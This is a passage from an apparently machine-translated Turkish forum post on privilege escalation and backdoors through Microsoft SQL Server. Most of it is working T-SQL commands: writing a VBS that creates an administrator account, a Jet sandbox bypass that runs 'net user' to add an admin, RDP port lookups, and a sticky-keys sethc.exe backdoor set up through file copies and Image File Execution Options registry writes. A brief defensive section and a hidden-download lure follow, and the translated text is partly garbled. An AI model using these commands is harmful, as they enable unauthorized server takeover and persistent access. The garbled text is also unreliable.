çalıştırıldıktan sonra, C sürücüsünde bir 1.bat belirir (eğer çalıştırma başarılıysa ama C sürücüsü orada değilse, klasörü yazmaya dönüştürebilirsiniz, çünkü hangi sunucunun C sürücüsünün kök dizini yazmayı engelliyor) Sonra cmd ftp -s:c:\1.bat Bu işlem tamamlandıktan sonra, CFT sürücü FTP'ye net olmayan bir yükseltme betiği indireceksiniz veya doğrudan VBS yükseltme betiği yazacaksınız declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user')' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","' exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3' Sonra cmd, t c:\1.vbs'i kaldırmak için cscrip'i çalıştırır 4. Önceki komut komutlarını yerine getirmek için tamir edilir, ancak bazı onarımlardan sonra yeni sorunlar ortaya çıkar (1) Mesaj: xp_cmdshell yürütme sırasında bir hata meydana geldi. 'CreateProcess' çağrısı hata kodu: '5' ile başarısız oldu. Hata 5, sistem tarafından önerilen bir hata numarasıdır, CreateProcess ise iş parçacığı oluşturmanın anlamıdır, bu hata oluşturma sistem dosyalarının cmd.exe ile çok ilgilidir; biri cmd'nin silinmesi, diğeri ise cmd'nin izninin azalması. Terminal portlarını ve açık durumları kontrol etmek için SQL: Yönetici Üsta.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' Tamam, aşağıdaki temel nokta, sistemin explorer dosyasını sistemin shift backdoor dosyasına kopyalamak için iki SQL komutu kullanmaktır ve aşağıdaki iki ifade ayrı ayrı yürütülür. Bu ifade explorer.exe sethc.exe @o int exec sp_oacreate 'scripremove ting.filesystemobject' ilan et, @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe'; Bu ifade sethc.exe dllcache dizinine kopyalanır @oo int exec sp_oacreate 'scrip remove ting.filesystemobject' bildir, @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe'; Diğer iki ifade odsole70.dll dosyayı kullanması gereken sp_oacreate saklanan prosedür kullanır, bu yüzden bu dosyanın hayatta kalması, oluşturulma başarısıyla ilgilidir. (2), xpsql.cpp: CreateProcess'ten 5 hata (satır 737) Bu durum daha karmaşık ve internette söyleniyor EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")'); Bu konunun haklarını yükseltmek için sandbox'u işaretledim, ancak pratiğim sayesinde bu başarı oranı çok düşük, çünkü çoğu sunucu c:\windows\system32\ias\ias.mdb silmiş. Sonra resim kaçırma sethc'yi deneyebilirsiniz, tabii ki, görüntü kaçırma da koşullu, bu saklanan prosedür xp_regwrite var olması gereken 1 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' 'Debugger' silinmedi Öncelikle, kayıt tutucu anahtarının ele geçirilip ele geçirilmediğini sorgulayabilirsiniz Yönetici Üsta.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger' Eğer prompt sorunu bulmazsa, kanıt silinir, istenirse sql komutunu çalıştırmak sethc.exe mümkün değildir EXECUTIVE master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', @value_name='Hata Ayıklayıcı', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe' Terminale 5 kez bağlanıp kaydıktan sonra doğrudan masaüstüne gidiyor ve ardından manuel olarak ekliyor.
Kayıt defteri, terminal portunu değiştirir
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Görüntü kaçırma önleme konusunda, bu esas olarak aşağıdaki yöntemlerle sağlanır:
★ İzin Kısıtlama Yasası
Kullanıcı artık kayıt anahtarına erişimi yoksa, bu bilgileri değiştiremez. Kayıt Editörü'nü açın ve HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows sayfasına gidin
NT\CurrentVersion\Image File Execution Options, bu öğeyi seçin, sağ tıklayın - > izinleri - > gelişmiş ve yönetici ile sistem kullanıcılarının izinlerini düşürün (burada sadece yazma işlemini iptal etmeniz yeterlidir).
★ Hızlı bıçak kesme yöntemi ve karmaşık kenevir yöntemi
Kayıt editörünü açın ve bara gidin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Sorun, Image File Execution Options öğesini doğrudan silerek çözülebilir.
SQL komutu kayıt defterini ele geçiriyor yapışkan anahtar kurulum arka kapısını xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Yazılım İndirme:Turistler, bu gönderinin gizli içeriğini görmek isterseniz lütfen Yanıt
|